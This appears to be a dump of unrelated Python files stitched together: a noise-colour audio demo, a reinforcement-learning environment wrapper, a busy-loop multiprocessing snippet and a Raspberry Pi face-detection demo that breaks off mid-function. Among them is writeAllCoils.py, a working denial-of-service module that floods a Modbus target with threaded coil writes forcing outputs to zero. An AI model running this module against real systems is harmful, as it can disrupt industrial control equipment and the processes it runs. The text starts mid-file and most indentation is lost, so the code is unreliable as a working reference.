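    # the same instance also works as an explicit context manager
    with limiter:
        print('context-managed call at {:.2f}'.format(time.time()))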
|
noise_color_demo.py
|
import matplotlib.pyplot as plt
import numpy as np
import scipy as sc
import sounddevice as sd
def generate_signal_from_spectrum(C_k: np.ndarray)-> np.ndarray:
"""
generates a real valued time domain signal from frequency coefficients via ifft. The signal is approximately scaled to ~[-1;1].
:param C_k: np.ndarray, dtype='float', one dimensional: two-sided frequency coefficients. The mapping from index to
frequency is the same as in scipy.fft.fftfreq
:return: np.ndarray, dtype='float': time domain signal ~[-1;1] according to the specified C_k
"""
length = C_k.shape[0]
# generate uniformly distributed phase values to get a real valued signal
phi_k = np.random.uniform(0, 2 * np.pi, length)
# calculate complex coefficients to get real signal
C_k_complex = np.ndarray(length, dtype="complex")
for k in range(-((length // 2)+1), (length // 2)):
C_k_complex[k] = C_k[k] * np.exp(1j * phi_k[k] * k)
# get the signal by inverse fft, take only the real part
signal = sc.fft.ifft(C_k_complex).real
# normalise signal
return signal / max(np.abs(signal.min()), signal.max())
def generate_pink_noise(duration: float, f_sample: float) -> np.ndarray:
"""
generates a real valued time domain signal of pink noise. The signal is approximately scaled to ~[-1;1].
:param duration: duration the noise signal should have in seconds
:param f_sample: sample frequency, determines the frequency/time resolution
:return: np.ndarray, dtype='float': real valued time domain signal ~[-1;1] of pink noise
"""
# calculate the number of time points and the time difference between them
length = duration * f_sample
delta_t = 1 / f_sample
# get the angular frequency axis in [omega]
f_k = sc.fft.fftfreq(length, d=delta_t)/(2 * np.pi)
# calculate the frequency coefficients based on the noise color
# pink noise has power spectral density of 1/f -> the amplitude has 1/sqrt(f)
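# (the PSD is proportional to |C_k|**2, so an amplitude of 1/sqrt(f) yields the desired 1/f power spectrum)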
C_k = np.ndarray(length)
C_k[1:] = 1 / np.sqrt(np.abs(f_k[1:]))
# no dc
C_k[0] = 0
# generate the signal from the frequency coefficients
return generate_signal_from_spectrum(C_k)
def generate_brown_noise(duration: float, f_sample: float) -> np.ndarray:
"""
generates a real valued time domain signal of brown/red noise. The signal is approximately scaled to ~[-1;1].
:param duration: duration the noise signal should have in seconds
:param f_sample: sample frequency, determines the frequency/time resolution
:return: np.ndarray, dtype='float': real valued time domain signal ~[-1;1] of brown/red noise
"""
# calculate the number of time points and the time difference between them
length = duration * f_sample
delta_t = 1 / f_sample
# get the angular frequency axis in [omega]
# calculate the frequency coefficients based on the noise color
# brown/red noise has power spectral density of 1/(f**2) -> the amplitude has 1/f
f_k = sc.fft.fftfreq(length, d=delta_t) / (2 * np.pi)
C_k = np.ndarray(length)
C_k[1:] = 1 / np.abs(f_k[1:])
# no dc
C_k[0] = 0
# generate the signal from the frequency coefficients
return generate_signal_from_spectrum(C_k)
def generate_infrared_noise(duration: float, f_sample: float) -> np.ndarray:
"""
generates a real valued time domain signal of 'infrared' noise. The signal is approximately scaled to ~[-1;1].
:param duration: duration the noise signal should have in seconds
:param f_sample: sample frequency, determines the frequency/time resolution
:return: np.ndarray, dtype='float': real valued time domain signal ~[-1;1] of 'infrared' noise
"""
# calculate the number of time points and the time difference between them
length = duration * f_sample
delta_t = 1 / f_sample
# get the angular frequency axis in [omega]
# calculate the frequency coefficients based on the noise color
# 'infrared' noise has power spectral density of 1/(f**4) -> the amplitude has 1/(f**2)
f_k = sc.fft.fftfreq(length, d=delta_t) / (2 * np.pi)
C_k = np.ndarray(length)
C_k[1:] = 1 / (np.abs(f_k[1:])**2)
# no dc
C_k[0] = 0
# generate the signal from the frequency coefficients
return generate_signal_from_spectrum(C_k)
def generate_white_noise(duration: float, f_sample: float) -> np.ndarray:
"""
generates a real valued time domain signal of white noise. The signal is approximately scaled to ~[-1;1].
:param duration: duration the noise signal should have in seconds
:param f_sample: sample frequency, determines the frequency/time resolution
:return: np.ndarray, dtype='float': real valued time domain signal ~[-1;1] of white noise
"""
# calculate the number of time points and the time difference between them
length = duration * f_sample
delta_t = 1 / f_sample
# calculate the frequency coefficients based on the noise color
# white noise has constant power spectral density over the frequency
C_k = np.ones(length)
# no dc
C_k[0] = 0
# generate the signal from the frequency coefficients
return generate_signal_from_spectrum(C_k)
# sampling frequency
fs = 44500 # < [Hz]
# duration of signal
dur_signal = 3 # < [s]
# length of the time domain signal displayed
dur_snipped = 2 # < [s]
# calculate the number of points
signal_len = int(fs * dur_signal)
snipped_len = int(fs * dur_snipped)
# set up the plot
fig = plt.figure(figsize=[15, 7])
sub = fig.subplots(1, 2)
# first generate, plot and play white noise
noise_color = "white"
sub[0].clear()
sub[0].set_title(f"{noise_color} noise: time domain signal")
sub[0].set_xlabel("time(s)")
sub[0].set_ylabel("amplitude")
sub[1].clear()
sub[1].set_title(f"{noise_color} noise: frequency domain signal")
sub[1].set_ylabel("power [dB]")
sub[1].set_xlabel("frequency [Hz]")
sub[1].set_xscale('log')
noise_signal = generate_white_noise(dur_signal, fs)
# time domain subplot with duration of {dur_snipped}
sub[0].plot([i / fs for i in range(snipped_len)], noise_signal[:int(dur_snipped * fs)])
# calculate the power spectral density of the noise
# calculate the fft of the signal
noise_psd = sc.fft.fft(noise_signal)
# only take the positive half side and only the amount of the complex values
noise_psd = np.abs(noise_psd[:signal_len // 2])
# calculate the decibel value psd[dB] = 10* log10(amplitude[lin]**2) = 20* log10(amplitude[lin])
noise_psd = 20 * np.log10(noise_psd)
sub[1].plot(np.linspace(0, fs/2, signal_len//2)[1:], noise_psd[1:])
# bg_thread = threading.Thread(target=background_task, args=[noise_signal, fs])
# bg_thread.start()
plt.show(block=False)
plt.pause(0.1)
# bg_thread.join()
# plot_thread = multiprocessing.Process(target=plot_task, args=[noise_color, noise_signal, noise_psd])
# plot_thread.start()
while True:
ans = input("for playing the noise sound press p, for coniuing to the next noise press c")
if len(ans) == 1:
if ans.count("c") != 0:
break
if ans.count("p") != 0:
sd.play(noise_signal, fs)
# pink noise
noise_color = "pink"
sub[0].clear()
sub[0].set_title(f"{noise_color} noise: time domain signal")
sub[0].set_xlabel("time(s)")
sub[0].set_ylabel("amplitude")
sub[1].clear()
sub[1].set_title(f"{noise_color} noise: frequency domain signal")
sub[1].set_ylabel("power [dB]")
sub[1].set_xlabel("frequency [Hz]")
sub[1].set_xscale('log')
noise_signal = generate_pink_noise(dur_signal, fs)
# time domain subplot with duration of {dur_snipped}
sub[0].plot([i / fs for i in range(snipped_len)], noise_signal[:int(dur_snipped * fs)])
# calculate the power spectral density of the noise
# calculate the fft of the signal
noise_psd = sc.fft.fft(noise_signal)
# only take the positive half side and only the amount of the complex values
noise_psd = np.abs(noise_psd[:signal_len // 2])
# calculate the decibel value psd[dB] = 10* log10(amplitude[lin]**2) = 20* log10(amplitude[lin])
noise_psd = 20 * np.log10(noise_psd)
sub[1].plot(np.linspace(0, fs/2, signal_len//2)[1:], noise_psd[1:])
plt.show(block=False)
plt.pause(0.1)
while True:
ans = input("for playing the noise sound press p, for coniuing to the next noise press c")
if len(ans) == 1:
if ans.count("c") != 0:
break
if ans.count("p") != 0:
sd.play(noise_signal, fs)
# brown noise
noise_color = "brown"
sub[0].clear()
sub[0].set_title(f"{noise_color} noise: time domain signal")
sub[0].set_xlabel("time(s)")
sub[0].set_ylabel("amplitude")
sub[1].clear()
sub[1].set_title(f"{noise_color} noise: frequency domain signal")
sub[1].set_ylabel("power [dB]")
sub[1].set_xlabel("frequency [Hz]")
sub[1].set_xscale('log')
noise_signal = generate_brown_noise(dur_signal, fs)
# time domain subplot with duration of {dur_snipped}
sub[0].plot([i / fs for i in range(snipped_len)], noise_signal[:int(dur_snipped * fs)])
# calculate the power spectral density of the noise
# calculate the fft of the signal
noise_psd = sc.fft.fft(noise_signal)
# only take the positive half side and only the amount of the complex values
noise_psd = np.abs(noise_psd[:signal_len // 2])
# calculate the decibel value psd[dB] = 10* log10(amplitude[lin]**2) = 20* log10(amplitude[lin])
noise_psd = 20 * np.log10(noise_psd)
sub[1].plot(np.linspace(0, fs/2, signal_len//2)[1:], noise_psd[1:])
plt.show(block=False)
plt.pause(0.1)
while True:
ans = input("for playing the noise sound press p, for coniuing to the next noise press c")
if len(ans) == 1:
if ans.count("c") != 0:
break
if ans.count("p") != 0:
sd.play(noise_signal, fs)
# infrared noise
noise_color = "infrared"
sub[0].clear()
sub[0].set_title(f"{noise_color} noise: time domain signal")
sub[0].set_xlabel("time(s)")
sub[0].set_ylabel("amplitude")
sub[1].clear()
sub[1].set_title(f"{noise_color} noise: frequency domain signal")
sub[1].set_ylabel("power [dB]")
sub[1].set_xlabel("frequency [Hz]")
sub[1].set_xscale('log')
noise_signal = generate_infrared_noise(dur_signal, fs)
# time domain subplot with duration of {dur_snipped}
sub[0].plot([i / fs for i in range(snipped_len)], noise_signal[:int(dur_snipped * fs)])
# calculate the power spectral density of the noise
# calculate the fft of the signal
noise_psd = sc.fft.fft(noise_signal)
# only take the positive half side and only the amount of the complex values
noise_psd = np.abs(noise_psd[:signal_len // 2])
# calculate the decibel value psd[dB] = 10* log10(amplitude[lin]**2) = 20* log10(amplitude[lin])
noise_psd = 20 * np.log10(noise_psd)
sub[1].plot(np.linspace(0, fs/2, signal_len//2)[1:], noise_psd[1:])
plt.show(block=False)
plt.pause(0.1)
while True:
ans = input("for playing the noise sound press p, for coniuing to the next noise press c")
if len(ans) == 1:
if ans.count("c") != 0:
break
if ans.count("p") != 0:
sd.play(noise_signal, fs)
|
writeAllCoils.py
|
import os
import threading
import random
from System.Core.Global import *
from System.Core.Colors import *
from System.Core.Modbus import *
from System.Lib import ipcalc
down = False
class Module:
info = {
'Name': 'DOS Write All Coils',
'Author': ['@enddo'],
'Description': ("DOS With Write All Coils"),
}
options = {
'RHOST' :['' ,True ,'The target IP address'],
'RPORT' :[502 ,False ,'The port number for modbus protocol'],
'UID' :['' ,True ,'Modbus Slave UID.'],
'Threads' :[1 ,False ,'The number of concurrent threads'],
'Output' :[False ,False ,'The stdout save in output directory']
}
output = ''
def exploit(self):
moduleName = self.info['Name']
print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start'
for i in range(int(self.options['Threads'][0])):
if(self.options['RHOST'][0]):
thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],))
thread.start()
THREADS.append(thread)
else:
break
if(down):
break
for thread in THREADS:
thread.join()
if(down):
self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING)
if(self.options['Output'][0]):
open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n')
self.output = ''
def printLine(self,str,color):
self.output += str + '\n'
if(str.find('[+]') != -1):
print str.replace('[+]',color + '[+]' + bcolors.ENDC)
elif(str.find('[-]') != -1):
print str.replace('[-]',color + '[-]' + bcolors.ENDC)
else:
print str
def do(self,ip):
global down
if(down == True):
return None
for i in range(0xffff):
c = connectToTarget(ip,self.options['RPORT'][0])
if(c == None):
down = True
return None
try:
self.printLine('[+] Write on Address ' + str(int(hex(i|0x1111),16)),bcolors.OKGREEN)
ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU05_Write_Single_Coil(outputAddr=int(hex(i|0x1111),16),outputValue=int('0x0000',16)),timeout=timeout, verbose=0)
ans = ModbusADU_Answer(str(ans))
self.printLine('[+] Response is :',bcolors.OKGREEN)
ans.show()
except:
pass
|
task.py
|
#######################################################################
# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
import gym
import gym_cartpolemod
import sys
import numpy as np
from .atari_wrapper import *
import multiprocessing as mp
import sys
from .bench import Monitor
from utils import *
class BasicTask:
def __init__(self, max_steps=sys.maxsize):
self.steps = 0
self.max_steps = max_steps
def reset(self):
self.steps = 0
state = self.env.reset()
return state
def normalize_state(self, state):
return state
def step(self, action):
next_state, reward, done, info = self.env.step(action)
self.steps += 1
done = (done or self.steps >= self.max_steps)
return next_state, reward, done, info
def random_action(self):
return self.env.action_space.sample()
def set_monitor(self, filename):
self.env = Monitor(self.env, filename)
class ClassicalControl(BasicTask):
def __init__(self, name='CartPole-v0', max_steps=200):
BasicTask.__init__(self, max_steps)
self.name = name
self.env = gym.make(self.name)
self.env._max_episode_steps = sys.maxsize
self.action_dim = self.env.action_space.n
self.state_dim = self.env.observation_space.shape[0]
class LunarLander(BasicTask):
name = 'LunarLander-v2'
success_threshold = 200
def __init__(self, max_steps=sys.maxsize):
BasicTask.__init__(self, max_steps)
self.env = gym.make(self.name)
self.action_dim = self.env.action_space.n
self.state_dim = self.env.observation_space.shape[0]
class PixelAtari(BasicTask):
def __init__(self, name, no_op, frame_skip, normalized_state=True,
frame_size=84, max_steps=10000, history_length=1):
BasicTask.__init__(self, max_steps)
self.normalized_state = normalized_state
self.name = name
env = gym.make(name)
assert 'NoFrameskip' in env.spec.id
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=no_op)
env = MaxAndSkipEnv(env, skip=frame_skip)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = ProcessFrame(env, frame_size)
if normalized_state:
env = NormalizeFrame(env)
self.env = StackFrame(env, history_length)
self.action_dim = self.env.action_space.n
def normalize_state(self, state):
return np.asarray(state) / 255.0
class RamAtari(BasicTask):
def __init__(self, name, no_op, frame_skip, max_steps=10000):
BasicTask.__init__(self, max_steps)
self.name = name
env = gym.make(name)
assert 'NoFrameskip' in env.spec.id
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=no_op)
env = SkipEnv(env, skip=frame_skip)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
self.env = env
self.action_dim = self.env.action_space.n
def normalize_state(self, state):
return np.asarray(state) / 255.0
class ContinuousMountainCar(BasicTask):
name = 'MountainCarContinuous-v0'
success_threshold = 90
def __init__(self, max_steps=sys.maxsize):
BasicTask.__init__(self, max_steps)
self.env = gym.make(self.name)
self.max_episode_steps = self.env._max_episode_steps
self.env._max_episode_steps = sys.maxsize
self.action_dim = self.env.action_space.shape[0]
self.state_dim = self.env.observation_space.shape[0]
class Pendulum(BasicTask):
name = 'Pendulum-v0'
success_threshold = -10
def __init__(self, max_steps=sys.maxsize):
BasicTask.__init__(self, max_steps)
self.env = gym.make(self.name)
self.action_dim = self.env.action_space.shape[0]
self.state_dim = self.env.observation_space.shape[0]
def step(self, action):
return BasicTask.step(self, np.clip(action, -2, 2))
class Box2DContinuous(BasicTask):
def __init__(self, name, max_steps=sys.maxsize):
BasicTask.__init__(self, max_steps)
self.name = name
self.env = gym.make(self.name)
self.action_dim = self.env.action_space.shape[0]
self.state_dim = self.env.observation_space.shape[0]
def step(self, action):
return BasicTask.step(self, np.clip(action, -1, 1))
class Roboschool(BasicTask):
def __init__(self, name, success_threshold=sys.maxsize, max_steps=sys.maxsize):
import roboschool
BasicTask.__init__(self, max_steps)
self.name = name
self.env = gym.make(self.name)
self.action_dim = self.env.action_space.shape[0]
self.state_dim = self.env.observation_space.shape[0]
def step(self, action):
return BasicTask.step(self, np.clip(action, -1, 1))
def sub_task(parent_pipe, pipe, task_fn, filename=None):
parent_pipe.close()
task = task_fn()
if filename is not None:
task.set_monitor(filename)
task.env.seed(np.random.randint(0, sys.maxsize))
while True:
op, data = pipe.recv()
if op == 'step':
pipe.send(task.step(data))
elif op == 'reset':
pipe.send(task.reset())
elif op == 'exit':
pipe.close()
return
else:
assert False, 'Unknown Operation'
class ParallelizedTask:
def __init__(self, task_fn, num_workers, tag='vanilla'):
self.task_fn = task_fn
self.task = task_fn()
self.name = self.task.name
# date = datetime.datetime.now().strftime("%I:%M%p-on-%B-%d-%Y")
mkdir('./log/%s-%s' % (self.name, tag))
filenames = ['./log/%s-%s/worker-%d' % (self.name, tag, i)
for i in range(num_workers)]
self.pipes, worker_pipes = zip(*[mp.Pipe() for _ in range(num_workers)])
args = [(p, wp, task_fn, filename)
for p, wp, filename in zip(self.pipes, worker_pipes, filenames)]
self.workers = [mp.Process(target=sub_task, args=arg) for arg in args]
for p in self.workers: p.start()
for p in worker_pipes: p.close()
self.observation_space = self.task.env.observation_space
self.action_space = self.task.env.action_space
def step(self, actions):
for pipe, action in zip(self.pipes, actions):
pipe.send(('step', action))
results = [p.recv() for p in self.pipes]
results = map(lambda x: np.stack(x), zip(*results))
return results
def reset(self, i=None):
if i is None:
for pipe in self.pipes:
pipe.send(('reset', None))
results = [p.recv() for p in self.pipes]
else:
self.pipes[i].send(('reset', None))
results = self.pipes[i].recv()
return np.stack(results)
def close(self):
for pipe in self.pipes:
pipe.send(('exit', None))
for p in self.workers: p.join()
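
# Minimal usage sketch (not part of the original file): ParallelizedTask runs task_fn
# in worker processes and steps them in lockstep. The snippet is hypothetical and
# assumes this module is imported as part of its package (relative imports above).
#
#   task = ParallelizedTask(lambda: ClassicalControl('CartPole-v0'), num_workers=4, tag='demo')
#   states = task.reset()                                   # stacked states, shape (4, state_dim)
#   actions = [task.task.random_action() for _ in range(4)]
#   next_states, rewards, dones, infos = task.step(actions)
#   task.close()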
|
multiprocess.py
|
from multiprocessing import Process
import os
# Code to be executed by the child process
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
while 1:
pass
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
p.start()
#p.join()
p = Process(target=run_proc, args=('test',))
p.start()
p = Process(target=run_proc, args=('test',))
p.start()
#print('Child process end.')
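    # Note (sketch, not in the original): rebinding `p` above loses the handles to the
    # earlier children, so they can never be joined. Keeping the Process objects in a
    # list makes an orderly shutdown possible, for example:
    #
    #   procs = [Process(target=run_proc, args=('test',)) for _ in range(3)]
    #   for proc in procs:
    #       proc.start()
    #   for proc in procs:
    #       proc.terminate()  # run_proc loops forever, so terminate before joining
    #       proc.join()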
|
demo_single_scale.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import _init_paths
import caffe
import cv2
import numpy as np
from python_wrapper import *
import os
from timeit import default_timer as timer
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import imutils
from imutils.video import FPS
class PiVideoStream:
def __init__(self,resolution=(352,240),framerate=32):
#initialize the camera and the stream
self.camera = PiCamera()
self.camera.resolution =resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port = True)
        #initialize the frame and the variable used to indicate if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
#start the thread to read frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
#keep looping infinitely until the thread is stopped
for f in self.stream:
            #grab the frame from the stream and clear the stream in preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
            #if the thread indicator variable is set, stop the thread and release the camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
#return the frame most recently read
return self.frame
def stop(self):
#indicate that the thread should be stopped
self.stopped = True
def bbreg(boundingbox, reg):
reg = reg.T
    # calibrate bounding boxes
if reg.shape[1] == 1:
print("reshape of reg")
pass # reshape of reg
w = boundingbox[:,2] - boundingbox[:,0] + 1
h = boundingbox[:,3] - boundingbox[:,1] + 1
bb0 = boundingbox[:,0] + reg[:,0]*w
bb1 = boundingbox[:,1] + reg[:,1]*h
bb2 = boundingbox[:,2] + reg[:,2]*w
bb3 = boundingbox[:,3] + reg[:,3]*h
boundingbox[:,0:4] = np.array([bb0, bb1, bb2, bb3]).T
#print "bb", boundingbox
return boundingbox
def pad(boxesA, w, h):
    boxes = boxesA.copy() # copy so the caller's array is not modified in place
#print '#################'
#print 'boxes', boxes
#print 'w,h', w, h
tmph = boxes[:,3] - boxes[:,1] + 1
tmpw = boxes[:,2] - boxes[:,0] + 1
numbox = boxes.shape[0]
#print 'tmph', tmph
#print 'tmpw', tmpw
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:,0:1][:,0]
y = boxes[:,1:2][:,0]
ex = boxes[:,2:3][:,0]
ey = boxes[:,3:4][:,0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w-1 + tmpw[tmp]
ex[tmp] = w-1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h-1 + tmph[tmp]
ey[tmp] = h-1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy = np.maximum(0, dy-1)
dx = np.maximum(0, dx-1)
y = np.maximum(0, y-1)
x = np.maximum(0, x-1)
edy = np.maximum(0, edy-1)
edx = np.maximum(0, edx-1)
ey = np.maximum(0, ey-1)
ex = np.maximum(0, ex-1)
#print "dy" ,dy
#print "dx" ,dx
#print "y " ,y
#print "x " ,x
#print "edy" ,edy
#print "edx" ,edx
#print "ey" ,ey
#print "ex" ,ex
#print 'boxes', boxes
return [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph]
def rerec(bboxA):
# convert bboxA to square
w = bboxA[:,2] - bboxA[:,0]
h = bboxA[:,3] - bboxA[:,1]
l = np.maximum(w,h).T
#print 'bboxA', bboxA
#print 'w', w
#print 'h', h
#print 'l', l
bboxA[:,0] = bboxA[:,0] + w*0.5 - l*0.5
bboxA[:,1] = bboxA[:,1] + h*0.5 - l*0.5
bboxA[:,2:4] = bboxA[:,0:2] + np.repeat([l], 2, axis = 0).T
return bboxA
def nms(boxes, threshold, type):
"""nms
:boxes: [:,0:5]
:threshold: 0.5 like
:type: 'Min' or others
:returns: TODO
"""
if boxes.shape[0] == 0:
return np.array([])
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
s = boxes[:,4]
area = np.multiply(x2-x1+1, y2-y1+1)
I = np.array(s.argsort()) # read s using I
    pick = []
while len(I) > 0:
xx1 = np.maximum(x1[I[-1]], x1[I[0:-1]])
yy1 = np.maximum(y1[I[-1]], y1[I[0:-1]])
xx2 = np.minimum(x2[I[-1]], x2[I[0:-1]])
yy2 = np.minimum(y2[I[-1]], y2[I[0:-1]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if type == 'Min':
o = inter / np.minimum(area[I[-1]], area[I[0:-1]])
else:
o = inter / (area[I[-1]] + area[I[0:-1]] - inter)
pick.append(I[-1])
I = I[np.where( o <= threshold)[0]]
return pick
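# Usage sketch for nms() (illustrative values only): boxes are rows of
# (x1, y1, x2, y2, score); the returned indices select the boxes to keep.
#
#   candidates = np.array([[10, 10, 50, 50, 0.9],
#                          [12, 12, 48, 52, 0.8],     # heavy overlap with the first box
#                          [100, 100, 140, 140, 0.7]])
#   keep = nms(candidates, 0.5, 'Union')               # IoU-based suppression
#   candidates = candidates[keep, :]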
def generateBoundingBox(map, reg, scale, t):
stride = 2
cellsize = 12
map = map.T
dx1 = reg[0,:,:].T
dy1 = reg[1,:,:].T
dx2 = reg[2,:,:].T
dy2 = reg[3,:,:].T
(x, y) = np.where(map >= t)
yy = y
xx = x
'''
if y.shape[0] == 1: # only one point exceed threshold
y = y.T
x = x.T
score = map[x,y].T
dx1 = dx1.T
dy1 = dy1.T
dx2 = dx2.T
dy2 = dy2.T
# a little stange, when there is only one bb created by PNet
#print "1: x,y", x,y
a = (x*map.shape[1]) + (y+1)
x = a/map.shape[0]
y = a%map.shape[0] - 1
#print "2: x,y", x,y
else:
score = map[x,y]
'''
#print "dx1.shape", dx1.shape
#print 'map.shape', map.shape
score = map[x,y]
reg = np.array([dx1[x,y], dy1[x,y], dx2[x,y], dy2[x,y]])
if reg.shape[0] == 0:
pass
boundingbox = np.array([yy, xx]).T
    bb1 = np.fix((stride * (boundingbox) + 1) / scale).T # the MATLAB reference uses "boundingbox-1" because MATLAB indexes from 1
    bb2 = np.fix((stride * (boundingbox) + cellsize - 1 + 1) / scale).T # Python indexes from 0, so no extra offset is needed
score = np.array([score])
boundingbox_out = np.concatenate((bb1, bb2, score, reg), axis=0)
#print '(x,y)',x,y
#print 'score', score
#print 'reg', reg
return boundingbox_out.T
def drawBoxes(im, boxes):
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
for i in range(x1.shape[0]):
cv2.rectangle(im, (int(x1[i]), int(y1[i])), (int(x2[i]), int(y2[i])), (0,255,0), 1)
return im
import time
_tstart_stack = []
def tic():
_tstart_stack.append(time.time())
def toc(fmt="Elapsed: %s s"):
print(fmt % (time.time()-_tstart_stack.pop()))
def detect_face(img, minsize, PNet, RNet, ONet, threshold, fastresize, factor):
img2 = img.copy()
factor_count = 0
total_boxes = np.zeros((0,9), np.float)
points = []
h = img.shape[0]
w = img.shape[1]
minl = min(h, w)
img = img.astype(float)
m = 12.0/minsize
minl = minl*m
#total_boxes = np.load('total_boxes.npy')
#total_boxes = np.load('total_boxes_242.npy')
#total_boxes = np.load('total_boxes_101.npy')
# create scale pyramid
scales = []
while minl >= 12:
scales.append(m * pow(factor, factor_count))
minl *= factor
factor_count += 1
# first stage
    scales = [0.128, 0.08, 0.148, 0.1]  # override the computed pyramid with fixed scales for this single-scale demo
tic()
for scale in scales:
hs = int(np.ceil(h*scale))
ws = int(np.ceil(w*scale))
if fastresize:
im_data = (img-127.5)*0.0078125 # [0,255] -> [-1,1]
im_data = cv2.resize(im_data, (ws,hs)) # default is bilinear
else:
im_data = cv2.resize(img, (ws,hs)) # default is bilinear
im_data = (im_data-127.5)*0.0078125 # [0,255] -> [-1,1]
#im_data = imResample(img, hs, ws); print "scale:", scale
im_data = np.swapaxes(im_data, 0, 2)
im_data = np.array([im_data], dtype = np.float)
PNet.blobs['data'].reshape(1, 3, ws, hs)
PNet.blobs['data'].data[...] = im_data
out = PNet.forward()
boxes = generateBoundingBox(out['prob1'][0,1,:,:], out['conv4-2'][0], scale, threshold[0])
if boxes.shape[0] != 0:
#print boxes[4:9]
#print 'im_data', im_data[0:5, 0:5, 0], '\n'
#print 'prob1', out['prob1'][0,0,0:3,0:3]
pick = nms(boxes, 0.5, 'Union')
if len(pick) > 0 :
boxes = boxes[pick, :]
if boxes.shape[0] != 0:
total_boxes = np.concatenate((total_boxes, boxes), axis=0)
#np.save('total_boxes_101.npy', total_boxes)
#####
# 1 #
#####
print("Pnet boxes:",total_boxes.shape[0])
print("Pnet time:")
toc()
#print total_boxes
#return total_boxes, []
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# nms
pick = nms(total_boxes, 0.7, 'Union')
total_boxes = total_boxes[pick, :]
#print("[2]:",total_boxes.shape[0])
# revise and convert to square
regh = total_boxes[:,3] - total_boxes[:,1]
regw = total_boxes[:,2] - total_boxes[:,0]
t1 = total_boxes[:,0] + total_boxes[:,5]*regw
t2 = total_boxes[:,1] + total_boxes[:,6]*regh
t3 = total_boxes[:,2] + total_boxes[:,7]*regw
t4 = total_boxes[:,3] + total_boxes[:,8]*regh
t5 = total_boxes[:,4]
total_boxes = np.array([t1,t2,t3,t4,t5]).T
#print "[3]:",total_boxes.shape[0]
#print regh
#print regw
#print 't1',t1
#print total_boxes
total_boxes = rerec(total_boxes) # convert box to square
#print("[4]:",total_boxes.shape[0])
total_boxes[:,0:4] = np.fix(total_boxes[:,0:4])
#print("[4.5]:",total_boxes.shape[0])
#print total_boxes
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print total_boxes.shape
#print total_boxes
numbox = total_boxes.shape[0]
if numbox > 0:
# second stage
#print 'tmph', tmph
#print 'tmpw', tmpw
#print "y,ey,x,ex", y, ey, x, ex,
#print "edy", edy
#tempimg = np.load('tempimg.npy')
# construct input for RNet
tempimg = np.zeros((numbox, 24, 24, 3)) # (24, 24, 3, numbox)
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
#print "dx[k], edx[k]:", dx[k], edx[k]
#print "dy[k], edy[k]:", dy[k], edy[k]
#print "img.shape", img[y[k]:ey[k]+1, x[k]:ex[k]+1].shape
#print "tmp.shape", tmp[dy[k]:edy[k]+1, dx[k]:edx[k]+1].shape
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
#print "y,ey,x,ex", y[k], ey[k], x[k], ex[k]
#print "tmp", tmp.shape
tempimg[k,:,:,:] = cv2.resize(tmp, (24, 24))
#tempimg[k,:,:,:] = imResample(tmp, 24, 24)
#print 'tempimg', tempimg[k,:,:,:].shape
#print tempimg[k,0:5,0:5,0]
#print tempimg[k,0:5,0:5,1]
#print tempimg[k,0:5,0:5,2]
#print k
#print tempimg.shape
#print tempimg[0,0,0,:]
tempimg = (tempimg-127.5)*0.0078125 # done in imResample function wrapped by python
#np.save('tempimg.npy', tempimg)
# RNet
tempimg = np.swapaxes(tempimg, 1, 3)
#print tempimg[0,:,0,0]
RNet.blobs['data'].reshape(numbox, 3, 24, 24)
RNet.blobs['data'].data[...] = tempimg
out = RNet.forward()
#print out['conv5-2'].shape
#print out['prob1'].shape
score = out['prob1'][:,1]
#print 'score', score
pass_t = np.where(score>threshold[1])[0]
#print 'pass_t', pass_t
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis = 1)
#print("[5]:",total_boxes.shape[0])
#print total_boxes
#print "1.5:",total_boxes.shape
mv = out['conv5-2'][pass_t, :].T
#print "mv", mv
